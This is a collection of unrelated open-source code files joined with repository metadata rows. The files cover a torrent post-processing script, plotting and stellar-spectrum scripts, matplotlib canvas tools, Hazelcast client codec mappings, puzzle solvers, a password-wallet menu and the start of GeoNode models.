scriptlogger.debug(u'TR_TORRENT_DIR: ' + os.getenv('TR_TORRENT_DIR'))
scriptlogger.debug(u'TR_TORRENT_NAME: ' + os.getenv('TR_TORRENT_NAME'))
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
else:
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - Your client should invoke the script with a Dir and a Relese Name')
print "No folder supplied - Your client should invoke the script with a Dir and a Relese Name"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
#def hella():
# if len(sys.argv) < 4:
# scriptlogger.error('No folder supplied - is this being called from HellaVCR?')
# print "No folder supplied - is this being called from HellaVCR?"
# sys.exit()
# else:
# dirName = sys.argv[3]
# nzbName = sys.argv[2]
#
# return (dirName, nzbName)
def main():
scriptlogger.info(u'Starting external PostProcess script ' + __file__)
host = config.get("General", "web_host")
port = config.get("General", "web_port")
username = config.get("General", "web_username")
password = config.get("General", "web_password")
try:
ssl = int(config.get("General", "enable_https"))
except (ConfigParser.NoOptionError, ValueError):
ssl = 0
try:
web_root = config.get("General", "web_root")
except ConfigParser.NoOptionError:
web_root = ""
tv_dir = config.get("General", "tv_download_dir")
use_torrents = int(config.get("General", "use_torrents"))
torrent_method = config.get("General", "torrent_method")
if not use_torrents:
scriptlogger.error(u'Enable Use Torrent on Sickbeard to use this Script. Aborting!')
print u'Enable Use Torrent on Sickbeard to use this Script. Aborting!'
time.sleep(3)
sys.exit()
if not torrent_method in ['utorrent', 'transmission', 'deluge', 'blackhole']:
scriptlogger.error(u'Unknown Torrent Method. Aborting!')
print u'Unknown Torrent Method. Aborting!'
time.sleep(3)
sys.exit()
dirName, nzbName = eval(locals()['torrent_method'])()
if dirName is None:
scriptlogger.error(u'MediaToSickbeard script need a dir to be run. Aborting!')
print u'MediaToSickbeard script need a dir to be run. Aborting!'
time.sleep(3)
sys.exit()
if not os.path.isdir(dirName):
scriptlogger.error(u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.')
print u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.'
time.sleep(3)
sys.exit()
if nzbName and os.path.isdir(os.path.join(dirName, nzbName)):
dirName = os.path.join(dirName, nzbName)
params = {}
params['quiet'] = 1
params['dir'] = dirName
if nzbName != None:
params['nzbName'] = nzbName
if ssl:
protocol = "https://"
else:
protocol = "http://"
if host == '0.0.0.0':
host = 'localhost'
url = protocol + host + ":" + port + web_root + "/home/postprocess/processEpisode"
scriptlogger.debug("Opening URL: " + url + ' with params=' + str(params))
print "Opening URL: " + url + ' with params=' + str(params)
try:
response = requests.get(url, auth=(username, password), params=params, verify=False)
except Exception, e:
scriptlogger.error(u': Unknown exception raised when opening url: ' + str(e))
time.sleep(3)
sys.exit()
if response.status_code == 401:
scriptlogger.error(u'Invalid Sickbeard Username or Password, check your config')
print 'Invalid Sickbeard Username or Password, check your config'
time.sleep(3)
sys.exit()
if response.status_code == 200:
scriptlogger.info(u'Script ' + __file__ + ' Succesfull')
print 'Script ' + __file__ + ' Succesfull'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,972,086,942,503,040,300 | 31.617647 | 134 | 0.628194 | false | 3.522499 | true | false | false |
victorpoughon/master-thesis | python/outlier_analysis.py | 1 | 1365 | #!/usr/bin/env python3
import os
import os.path
import sys
import numpy as np
import matplotlib.pyplot as plt
from features_common import match_angle, base_plot
def outlier_frequency_plot(path, angles, threshold):
f, ax = base_plot()
ax.plot(100 * np.cumsum(np.abs(angles) > threshold) / angles.size)
ax.set_xlabel("Match number")
ax.set_ylabel("Outlier fraction (%)")
ax.set_ylim([0, 100])
f.savefig(path, bbox_inches='tight')
plt.close(f)
if __name__ == "__main__":
if len(sys.argv) < 2:
path = "."
else:
path = sys.argv[1]
# Produce outlier plots for all directories containing outlier_threshold.txt
for root, subdirs, files in os.walk(path):
if "matches.txt" in files:
shape = np.loadtxt(os.path.join(root, "shape.txt"))
matches = np.loadtxt(os.path.join(root, "matches.txt"), comments="#")
threshold = np.loadtxt(os.path.join(root, "outlier_threshold.txt"))
if threshold.size == 1:
print("outlier_analysis.py: " + root)
# Compute matches angles
angles = match_angle(matches, shape)
outlier_frequency_plot(os.path.join(root, "plot_outliers.pdf"), angles, threshold)
else:
print("outlier_analysis.py: " + root + " --- empty outlier_threshold.txt")
| mit | 2,286,111,514,915,068,000 | 34 | 98 | 0.605861 | false | 3.527132 | false | false | false |
dcf21/4most-4gp-scripts | src/scripts/synthesize_samples/synthesize_galah_with_microturbulence.py | 1 | 4084 | #!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_galah.py>, but <./synthesize_galah.py> will not work.
"""
Take parameters of GALAH sample of stars emailed by Karin on 30 Oct 2017, and synthesize spectra using
TurboSpectrum.
"""
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
element_list = (
'Al', 'Ba', 'C', 'Ca', 'Ce', 'Co', 'Cr', 'Cu', 'Eu', 'K', 'La', 'Li', 'Mg', 'Mn', 'Mo', 'Na', 'Nd', 'Ni', 'O',
'Rb', 'Ru', 'Sc', 'Si', 'Sm', 'Sr', 'Ti', 'V', 'Y', 'Zn', 'Zr'
)
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GALAH sample spectra, with microturbulence")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="galah_sample_v2",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../../../downloads/GALAH_trainingset_4MOST_errors.fits")
galah_stars = f[1].data
galah_fields = galah_stars.names
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(galah_stars)):
fe_abundance = float(galah_stars.Feh_sme[star_index])
star_list_item = {
"name": "star_{:08d}".format(star_index),
"Teff": float(galah_stars.Teff_sme[star_index]),
"[Fe/H]": fe_abundance,
"logg": float(galah_stars.Logg_sme[star_index]),
"extra_metadata": {},
"free_abundances": {},
"input_data": {}
}
# Work out micro-turbulent velocity
if (star_list_item['logg'] >= 4.2) and (star_list_item['Teff'] <= 5500):
star_list_item['microturbulence'] = \
1.1 + 1e-4 * (star_list_item['Teff'] - 5500) + 4e-7 * (star_list_item['Teff'] - 5500) ** 2
else:
star_list_item['microturbulence'] = \
1.1 + 1.6e-4 * (star_list_item['Teff'] - 5500)
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
metadata = star_list_item["extra_metadata"]
for element in element_list:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}_abund_sme".format(element)
# Abundance is specified as [X/Fe]. Convert to [X/H]
abundance = galah_stars[fits_field_name][star_index] + fe_abundance
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
metadata["flag_{}".format(element)] = float(
galah_stars["flag_{}_abund_sme".format(element)][star_index])
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in galah_fields:
value = galah_stars[col_name][star_index]
if galah_stars.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
| mit | 1,813,588,961,459,979,500 | 37.168224 | 119 | 0.643732 | false | 3.143957 | false | false | false |
SamHames/scikit-image | skimage/viewer/canvastools/base.py | 1 | 5472 | import numpy as np
try:
from matplotlib import lines
except ImportError:
pass
__all__ = ['CanvasToolBase', 'ToolHandles']
def _pass(*args):
pass
class CanvasToolBase(object):
"""Base canvas tool for matplotlib axes.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool is displayed.
on_move : function
Function called whenever a control handle is moved.
This function must accept the end points of line as the only argument.
on_release : function
Function called whenever the control handle is released.
on_enter : function
Function called whenever the "enter" key is pressed.
useblit : bool
If True, update canvas by blitting, which is much faster than normal
redrawing (turn off for debugging purposes).
"""
def __init__(self, ax, on_move=None, on_enter=None, on_release=None,
useblit=True):
self.ax = ax
self.canvas = ax.figure.canvas
self.img_background = None
self.cids = []
self._artists = []
self.active = True
if useblit:
self.connect_event('draw_event', self._blit_on_draw_event)
self.useblit = useblit
self.callback_on_move = _pass if on_move is None else on_move
self.callback_on_enter = _pass if on_enter is None else on_enter
self.callback_on_release = _pass if on_release is None else on_release
self.connect_event('key_press_event', self._on_key_press)
def connect_event(self, event, callback):
"""Connect callback with an event.
This should be used in lieu of `figure.canvas.mpl_connect` since this
function stores call back ids for later clean up.
"""
cid = self.canvas.mpl_connect(event, callback)
self.cids.append(cid)
def disconnect_events(self):
"""Disconnect all events created by this widget."""
for c in self.cids:
self.canvas.mpl_disconnect(c)
def ignore(self, event):
"""Return True if event should be ignored.
This method (or a version of it) should be called at the beginning
of any event callback.
"""
return not self.active
def set_visible(self, val):
for artist in self._artists:
artist.set_visible(val)
def _blit_on_draw_event(self, event=None):
self.img_background = self.canvas.copy_from_bbox(self.ax.bbox)
self._draw_artists()
def _draw_artists(self):
for artist in self._artists:
self.ax.draw_artist(artist)
def remove(self):
"""Remove artists and events from axes.
Note that the naming here mimics the interface of Matplotlib artists.
"""
#TODO: For some reason, RectangleTool doesn't get properly removed
self.disconnect_events()
for a in self._artists:
a.remove()
def redraw(self):
"""Redraw image and canvas artists.
This method should be called by subclasses when artists are updated.
"""
if self.useblit and self.img_background is not None:
self.canvas.restore_region(self.img_background)
self._draw_artists()
self.canvas.blit(self.ax.bbox)
else:
self.canvas.draw_idle()
def _on_key_press(self, event):
if event.key == 'enter':
self.callback_on_enter(self.geometry)
self.set_visible(False)
self.redraw()
@property
def geometry(self):
"""Geometry information that gets passed to callback functions."""
return None
class ToolHandles(object):
"""Control handles for canvas tools.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool handles are displayed.
x, y : 1D arrays
Coordinates of control handles.
marker : str
Shape of marker used to display handle. See `matplotlib.pyplot.plot`.
marker_props : dict
Additional marker properties. See :class:`matplotlib.lines.Line2D`.
"""
def __init__(self, ax, x, y, marker='o', marker_props=None):
self.ax = ax
props = dict(marker=marker, markersize=7, mfc='w', ls='none',
alpha=0.5, visible=False)
props.update(marker_props if marker_props is not None else {})
self._markers = lines.Line2D(x, y, animated=True, **props)
self.ax.add_line(self._markers)
self.artist = self._markers
@property
def x(self):
return self._markers.get_xdata()
@property
def y(self):
return self._markers.get_ydata()
def set_data(self, pts, y=None):
"""Set x and y positions of handles"""
if y is not None:
x = pts
pts = np.array([x, y])
self._markers.set_data(pts)
def set_visible(self, val):
self._markers.set_visible(val)
def set_animated(self, val):
self._markers.set_animated(val)
def draw(self):
self.ax.draw_artist(self._markers)
def closest(self, x, y):
"""Return index and pixel distance to closest index."""
pts = np.transpose((self.x, self.y))
# Transform data coordinates to pixel coordinates.
pts = self.ax.transData.transform(pts)
diff = pts - ((x, y))
dist = np.sqrt(np.sum(diff**2, axis=1))
return np.argmin(dist), np.min(dist)
| bsd-3-clause | -8,322,848,763,189,975,000 | 30.448276 | 78 | 0.606725 | false | 3.965217 | false | false | false |
mmedenjak/hazelcast-client-protocol | py/__init__.py | 1 | 10457 | import keyword
import re
def py_types_encode_decode(t):
if t not in _py_types:
raise NotImplementedError("Missing type Mapping")
_pattern1 = re.compile("(.)([A-Z][a-z]+)")
_pattern2 = re.compile("([a-z0-9])([A-Z])")
def py_param_name(type_name):
type_name = _pattern1.sub(r"\1_\2", type_name)
type_name = _pattern2.sub(r"\1_\2", type_name).lower()
if keyword.iskeyword(type_name):
return "_%s" % type_name
return type_name
def py_get_import_path_holders(param_type):
return import_paths.get(param_type, [])
py_ignore_service_list = {
"Cache",
"CardinalityEstimator",
"Client.addPartitionLostListener",
"Client.authenticationCustom",
"Client.createProxies",
"Client.removeMigrationListener",
"Client.removePartitionLostListener",
"Client.triggerPartitionAssignment",
"ContinuousQuery",
"CPSubsystem",
"DurableExecutor",
"DynamicConfig",
"ExecutorService.cancelOnMember",
"ExecutorService.cancelOnPartition",
"Map.addPartitionLostListener",
"Map.aggregate",
"Map.aggregateWithPredicate",
"Map.eventJournalRead",
"Map.eventJournalSubscribe",
"Map.project",
"Map.projectWithPredicate",
"Map.removeAll",
"Map.removeInterceptor",
"Map.removePartitionLostListener",
"Map.submitToKey",
"MultiMap.delete",
"MC",
"Queue.drainTo",
"ReplicatedMap.addNearCacheEntryListener",
"ScheduledExecutor",
"Sql",
"Topic.publishAll",
"TransactionalMap.containsValue",
"XATransaction",
}
class ImportPathHolder:
def __init__(self, name, path):
self.name = name
self.path = path
def get_import_statement(self):
return "from hazelcast.%s import %s" % (self.path, self.name)
class PathHolders:
DataCodec = ImportPathHolder("DataCodec", "protocol.builtin")
ByteArrayCodec = ImportPathHolder("ByteArrayCodec", "protocol.builtin")
LongArrayCodec = ImportPathHolder("LongArrayCodec", "protocol.builtin")
Address = ImportPathHolder("Address", "core")
AddressCodec = ImportPathHolder("AddressCodec", "protocol.codec.custom.address_codec")
ErrorHolder = ImportPathHolder("ErrorHolder", "protocol")
ErrorHolderCodec = ImportPathHolder("ErrorHolderCodec", "protocol.codec.custom.error_holder_codec")
StackTraceElement = ImportPathHolder("StackTraceElement", "protocol")
StackTraceElementCodec = ImportPathHolder("StackTraceElementCodec",
"protocol.codec.custom.stack_trace_element_codec")
SimpleEntryView = ImportPathHolder("SimpleEntryView", "core")
SimpleEntryViewCodec = ImportPathHolder("SimpleEntryViewCodec", "protocol.codec.custom.simple_entry_view_codec")
DistributedObjectInfo = ImportPathHolder("DistributedObjectInfo", "core")
DistributedObjectInfoCodec = ImportPathHolder("DistributedObjectInfoCodec",
"protocol.codec.custom.distributed_object_info_codec")
MemberInfo = ImportPathHolder("MemberInfo", "core")
MemberInfoCodec = ImportPathHolder("MemberInfoCodec", "protocol.codec.custom.member_info_codec")
MemberVersion = ImportPathHolder("MemberVersion", "core")
MemberVersionCodec = ImportPathHolder("MemberVersionCodec", "protocol.codec.custom.member_version_codec")
StringCodec = ImportPathHolder("StringCodec", "protocol.builtin", )
ListLongCodec = ImportPathHolder("ListLongCodec", "protocol.builtin")
ListIntegerCodec = ImportPathHolder("ListIntegerCodec", "protocol.builtin")
ListUUIDCodec = ImportPathHolder("ListUUIDCodec", "protocol.builtin")
ListDataCodec = ImportPathHolder("ListDataCodec", "protocol.builtin")
ListMultiFrameCodec = ImportPathHolder("ListMultiFrameCodec", "protocol.builtin")
EntryListCodec = ImportPathHolder("EntryListCodec", "protocol.builtin")
EntryListLongByteArrayCodec = ImportPathHolder("EntryListLongByteArrayCodec", "protocol.builtin")
EntryListIntegerUUIDCodec = ImportPathHolder("EntryListIntegerUUIDCodec", "protocol.builtin")
EntryListIntegerLongCodec = ImportPathHolder("EntryListIntegerLongCodec", "protocol.builtin")
EntryListIntegerIntegerCodec = ImportPathHolder("EntryListIntegerIntegerCodec", "protocol.builtin")
EntryListUUIDLongCodec = ImportPathHolder("EntryListUUIDLongCodec", "protocol.builtin")
EntryListUUIDUUIDCodec = ImportPathHolder("EntryListUUIDUUIDCodec", "protocol.builtin")
EntryListUUIDListIntegerCodec = ImportPathHolder("EntryListUUIDListIntegerCodec", "protocol.builtin")
MapCodec = ImportPathHolder("MapCodec", "protocol.builtin")
CodecUtil = ImportPathHolder("CodecUtil", "protocol.builtin")
IndexConfig = ImportPathHolder("IndexConfig", "config")
IndexConfigCodec = ImportPathHolder("IndexConfigCodec", "protocol.codec.custom.index_config_codec")
BitmapIndexOptions = ImportPathHolder("BitmapIndexOptions", "config")
BitmapIndexOptionsCodec = ImportPathHolder("BitmapIndexOptionsCodec",
"protocol.codec.custom.bitmap_index_options_codec")
PagingPredicateHolder = ImportPathHolder("PagingPredicateHolder", "protocol")
PagingPredicateHolderCodec = ImportPathHolder("PagingPredicateHolderCodec",
"protocol.codec.custom.paging_predicate_holder_codec")
AnchorDataListHolder = ImportPathHolder("AnchorDataListHolder", "protocol")
AnchorDataListHolderCodec = ImportPathHolder("AnchorDataListHolderCodec",
"protocol.codec.custom.anchor_data_list_holder_codec")
EndpointQualifier = ImportPathHolder("EndpointQualifier", "protocol")
EndpointQualifierCodec = ImportPathHolder("EndpointQualifierCodec",
"protocol.codec.custom.endpoint_qualifier_codec")
RaftGroupId = ImportPathHolder("RaftGroupId", "protocol")
RaftGroupIdCodec = ImportPathHolder("RaftGroupIdCodec", "protocol.codec.custom.raft_group_id_codec")
import_paths = {
"CodecUtil": PathHolders.CodecUtil,
"longArray": [PathHolders.LongArrayCodec],
"byteArray": [PathHolders.ByteArrayCodec],
"String": [PathHolders.StringCodec],
"Data": [PathHolders.DataCodec],
"Address": [PathHolders.Address, PathHolders.AddressCodec],
"ErrorHolder": [PathHolders.ErrorHolder, PathHolders.ErrorHolderCodec],
"StackTraceElement": [PathHolders.StackTraceElement, PathHolders.StackTraceElementCodec],
"SimpleEntryView": [PathHolders.SimpleEntryView, PathHolders.SimpleEntryViewCodec],
"DistributedObjectInfo": [PathHolders.DistributedObjectInfo, PathHolders.DistributedObjectInfoCodec],
"MemberInfo": [PathHolders.MemberInfo, PathHolders.MemberInfoCodec],
"MemberVersion": [PathHolders.MemberVersion, PathHolders.MemberVersionCodec],
"RaftGroupId": [PathHolders.RaftGroupId, PathHolders.RaftGroupIdCodec],
"List_Long": [PathHolders.ListLongCodec],
"List_Integer": [PathHolders.ListIntegerCodec],
"List_UUID": [PathHolders.ListUUIDCodec],
"List_String": [PathHolders.ListMultiFrameCodec, PathHolders.StringCodec],
"List_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"ListCN_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"List_MemberInfo": [PathHolders.ListMultiFrameCodec, PathHolders.MemberInfoCodec],
"List_DistributedObjectInfo": [PathHolders.ListMultiFrameCodec, PathHolders.DistributedObjectInfoCodec],
"List_StackTraceElement": [PathHolders.ListMultiFrameCodec, PathHolders.StackTraceElementCodec],
"EntryList_String_String": [PathHolders.EntryListCodec, PathHolders.StringCodec],
"EntryList_String_byteArray": [PathHolders.EntryListCodec, PathHolders.StringCodec, PathHolders.ByteArrayCodec],
"EntryList_Long_byteArray": [PathHolders.EntryListLongByteArrayCodec],
"EntryList_Integer_UUID": [PathHolders.EntryListIntegerUUIDCodec],
"EntryList_Integer_Long": [PathHolders.EntryListIntegerLongCodec],
"EntryList_Integer_Integer": [PathHolders.EntryListIntegerIntegerCodec],
"EntryList_UUID_Long": [PathHolders.EntryListUUIDLongCodec],
"EntryList_String_EntryList_Integer_Long": [PathHolders.EntryListCodec, PathHolders.StringCodec,
PathHolders.EntryListIntegerLongCodec],
"EntryList_UUID_UUID": [PathHolders.EntryListUUIDUUIDCodec],
"EntryList_UUID_List_Integer": [PathHolders.EntryListUUIDListIntegerCodec],
"EntryList_Data_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec],
"EntryList_Data_List_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec, PathHolders.ListDataCodec],
"Map_String_String": [PathHolders.MapCodec, PathHolders.StringCodec],
"IndexConfig": [PathHolders.IndexConfig, PathHolders.IndexConfigCodec],
"ListIndexConfig": [PathHolders.IndexConfigCodec, PathHolders.ListMultiFrameCodec],
"BitmapIndexOptions": [PathHolders.BitmapIndexOptions, PathHolders.BitmapIndexOptionsCodec],
"AnchorDataListHolder": [PathHolders.AnchorDataListHolder, PathHolders.AnchorDataListHolderCodec],
"PagingPredicateHolder": [PathHolders.PagingPredicateHolder, PathHolders.PagingPredicateHolderCodec],
"EndpointQualifier": [PathHolders.EndpointQualifier, PathHolders.EndpointQualifierCodec],
"Map_EndpointQualifier_Address": [PathHolders.MapCodec, PathHolders.EndpointQualifierCodec,
PathHolders.AddressCodec]
}
_py_types = {
"boolean",
"byte",
"int",
"long",
"UUID",
"byteArray",
"longArray",
"String",
"Data",
"Address",
"DistributedObjectInfo",
"SimpleEntryView",
"ErrorHolder",
"StackTraceElement",
"MemberInfo",
"MemberVersion",
"EndpointQualifier",
"RaftGroupId",
"AnchorDataListHolder",
"PagingPredicateHolder",
"IndexConfig",
"BitmapIndexOptions",
"List_Integer",
"List_Long",
"List_UUID",
"List_byteArray",
"List_Data",
"List_DistributedObjectInfo",
"List_MemberInfo",
"List_String",
"List_StackTraceElement",
"ListCN_Data",
"EntryList_UUID_Long",
"EntryList_String_String",
"EntryList_UUID_List_Integer",
"EntryList_Data_Data",
"Map_String_String",
"Map_EndpointQualifier_Address",
}
def py_escape_keyword(value):
if value in keyword.kwlist:
return "%s_" % value
else:
return value
| apache-2.0 | 2,040,683,131,968,967,400 | 44.864035 | 116 | 0.724969 | false | 3.843072 | true | false | false |
pirius/draught-board-puzzle-aka-checkerboard-puzzle-solver | python/source/checkerboardpuzzle_utils.py | 1 | 1570 | from numpy import array, rot90, fliplr, array_equal
from checkerboardpuzzle_stone import Rotation
def generate_rotated_nparrays(nparray):
"""generate rotated and mirrored versions of given nparray."""
r1 = rot90(nparray)
r2 = rot90(r1)
r3 = rot90(r2)
f1 = fliplr(nparray)
f2 = fliplr(r1)
f3 = fliplr(r2)
f4 = fliplr(r3)
all_rot = [nparray,r1,r2,r3,f1,f2,f3,f4]
return all_rot
def generate_rotations(fields):
"""generate all rotations of that stone."""
#r1 = rot90(fields)
#r2 = rot90(r1)
#r3 = rot90(r2)
#f1 = fliplr(fields)
#f2 = fliplr(r1)
#f3 = fliplr(r2)
#f4 = fliplr(r3)
#all_rot = [r1,r2,r3,f1,f2,f3,f4]
all_rot = generate_rotated_nparrays(fields)
# check if rotations are equal
rotations = [] # [Rotation(fields)]
for r_new in all_rot:
l = len(filter(lambda r_old:array_equal(r_old.nparray,r_new), rotations))
if l > 1:
raise Exception('Rotations doubled? That should be impossible!')
elif l == 0:
# not in rotations yet, add
rotations = rotations + [Rotation(r_new)]
return rotations
def unique_nparrays(nparrays):
"""return unique list of nparrays."""
unique = []
for a in nparrays:
for u in unique:
if (a == u).all():
break
else:
unique = unique + [a]
return unique
def append_to_file(filepath, text):
"""append text to given file."""
with open(filepath, 'a') as myfile:
myfile.write(text)
myfile.close() | lgpl-3.0 | 5,289,287,308,255,993,000 | 28.641509 | 81 | 0.593631 | false | 2.864964 | false | false | false |
seeba8/str8tssolver | field.py | 1 | 6062 | from square import Square
from street import Street
class Field:
def __init__(self, test=None):
self.streets = set()
if test != None:
blacks = test["blacks"]
values = test["values"]
self.squares = [Square(i, blacks[i] == "1", "123456789" if values[i] == "0" else values[i]) for i in
range(81)]
self.collect_streets()
else:
self.squares = [Square(i) for i in range(81)]
def solve(self):
last_perf = 0
current_perf = 1
while (last_perf != current_perf):
last_perf = self.get_total_length()
self.eliminate_possibilities()
current_perf = self.get_total_length()
if self.is_solved():
return True
return False
def is_solved(self):
for s in self:
if not s.is_number() and not s.is_black:
return False
return True
def collect_streets(self):
for square in self:
if not square.is_black:
s = self.get_hstreet(square)
if s != None:
self.streets.add(s)
s = self.get_vstreet(square)
if s != None:
self.streets.add(s)
def __getitem__(self,i):
if isinstance(i,tuple):
x,y = i
if x < 0 or x >= 9 or y < 0 or y >= 9:
raise IndexError
i = y * 9 + x
try:
return self.squares[i]
except:
raise
def __iter__(self):
for s in self.squares:
yield s
def get_row(self, square, without_square=False):
for i in range(9):
s = self[i, square.y]
if not without_square or s != square:
yield s
def get_column(self, square, without_square=False):
for i in range(9):
s = self[square.x, i]
if not without_square or s != square:
yield s
def get_hstreet(self, square):
x = square.x
y = square.y
street = {square}
if x - 1 >= 0 and not self[x - 1, y].is_black:
return None
for i in range(1, 10):
try:
if not self[x + i, y].is_black:
street.add(self[x + i, y])
else:
return Street(street)
except IndexError:
return Street(street)
return Street(street)
def get_vstreet(self, square):
x = square.x
y = square.y
street = {square}
if y - 1 >= 0 and not self[x, y - 1].is_black:
return None
for i in range(1, 10):
try:
if not self[x, y + i].is_black:
street.add(self[x, y + i])
else:
return Street(street)
except:
return Street(street)
return Street(street)
def get_rest_without_street(self, street):
if street.is_horizontal:
y = street.y
for x in range(9):
if not self[x, y] in street:
yield self[x, y]
else:
x = street.x
for y in range(9):
if not self[x, y] in street:
yield self[x, y]
def remove_street_options_from_rest(self, street):
"""
e.g.: if len(street) == 2 and street_options = {1,2,3}, then
one value in the middle, {2}, can be removed
"""
street_options = street.get_options()
if len(street_options) < 9 and len(street_options) < len(street) * 2:
removables = ("".join(sorted(street_options))[len(street_options) -
len(street):len(street)])
for o in removables:
for s in self.get_rest_without_street(street):
s.remove_option(o)
def eliminate_possibilities(self):
for square in self:
if square.is_number():
self.eliminate_rowcol(square)
for street in self.streets:
street.eliminate_nonconsec()
self.remove_street_options_from_rest(street)
for square in street:
if square.is_number():
street.eliminate_out_of_range(square)
def eliminate_rowcol(self, square):
v = square.get_value()
for s in self.get_row(square,True):
s.remove_option(v)
for s in self.get_column(square,True):
s.remove_option(v)
def _construct_output(self, show_hints=False):
rowsep = "+-------" * 9 + "+\n"
rowstart = ["| "]*3
output = rowsep
sa = rowstart
for i in range(81):
s = self[i]
placeholder = "\u2588" if s.is_black else " "
if s.is_number():
sa = [sa[r] + placeholder + (s.get_value() if r == 1 else placeholder)
+ placeholder for r in range(3)]
else:
if show_hints and not s.is_black:
o = self[i].get_options()
options = "".join([str(r) if str(r) in o else placeholder for r in range(1, 10)])
sa = [sa[r] + options[3 * r:3 * (r + 1)] for r in range(3)]
else:
sa = [sa[r] + placeholder*3 for r in range(3)]
sa = [sa[r] + " | " for r in range(3)]
if (i+1) % 9 == 0:
output += "\n".join(sa) + "\n"
output += rowsep
sa = rowstart
return output[:-1]
def __str__(self):
return self._construct_output()
def show(self):
print(str(self))
return str(self)
def show_hints(self):
s = self._construct_output(True)
print(s)
return s
def get_total_length(self):
return len("".join(s.get_options() for s in self))
| gpl-3.0 | -2,845,258,074,390,722,000 | 31.945652 | 112 | 0.466678 | false | 3.868539 | false | false | false |
hashtag1138/pass_wallet | menutrousseau.py | 1 | 2983 | from error_handler import MyError, ErrorScreen0
from menu import Menu
import os, time
class Trousseau0(Menu):
def __init__(self, parent):
super().__init__(parent)
self.entrees = None
self.selected = 0
def loadPasswordList(self):
try:
# --- Open ---
conf_file = open('config.txt', 'r')
line = conf_file.readline()
# --- Read ---
while ( "password_directory=" not in line) and len(line)>0: #Lecture
line = conf_file.readline()
# --- Search option ---
if not "password_directory=" in line :
raise MyError("Password_directory not found in config.txt")
# --- Extract path value ---
start = line.find("=") + 1
if start == 0 :
raise MyError(" '=' not found in : " + line)
end = line.find(";")
if end == -1 :
raise MyError(" ';' not found in : " + line)
password_path = line[start:end]
if not os.path.exists(password_path):
raise MyError(password_path + " not found")
pass_list = []
for filename in os.listdir(password_path):
pass_file = open(password_path+'/'+filename, 'r')
content = pass_file.readline()
pass_list.append({'name': filename, 'submenu':
Password(self, titre=filename, encrypted=content)})
return pass_list
except Exception as e:
print(e)
return [{'name' : '0 mot de passe', 'submenu' : ErrorScreen0(self, e)}]
def display(self, key, display):
# --- Loading Passwords ---
if not self.entrees:
self.entrees = self.loadPasswordList()
# --- Rendering ---
self.printList(display, self.selected, self.entrees)
# --- User's Inputs ---
return self.selectMenu(key, display)
class Password(Menu):
def __init__(self, parent, titre=None, encrypted=None):
super().__init__(parent)
self.titre = titre
self.encrypted = encrypted
self.decrypted = None
self.menu_unlock = Unlock0(self)
self.menu_play = Play0(self)
self.menu_modify = Modify0(self)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println(self.titre)
display.println(self.encrypted)
return self
class Unlock0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
display.clear()
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Unlock0")
return self
class Play0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Play0")
return self
class Modify0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Modify0")
return self
| gpl-3.0 | -3,663,898,111,024,548,400 | 22.864 | 74 | 0.610795 | false | 3.117032 | false | false | false |
terranodo/geonode | geonode/base/models.py | 1 | 34374 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import datetime
import math
import os
import logging
from pyproj import transform, Proj
from urlparse import urljoin, urlsplit
from django.db import models
from django.core import serializers
from django.db.models import Q
